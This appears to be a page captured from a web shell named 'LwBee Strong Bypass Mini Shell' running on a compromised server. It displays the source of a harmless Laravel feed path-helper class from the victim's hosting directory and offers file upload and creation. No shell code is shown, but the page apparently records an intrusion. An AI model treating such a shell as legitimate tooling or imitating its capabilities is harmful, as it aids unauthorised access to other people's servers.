/home/aloic1/public_html/core/vendor/spatie/laravel-feed/src/Helpers/Path.php
<?php

namespace Spatie\Feed\Helpers;

class Path
{
    public static function merge(...$paths): string
    {
        return collect($paths)->map(function (string $path) {
            return trim($path, '/');
        })->implode('/');
    }
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File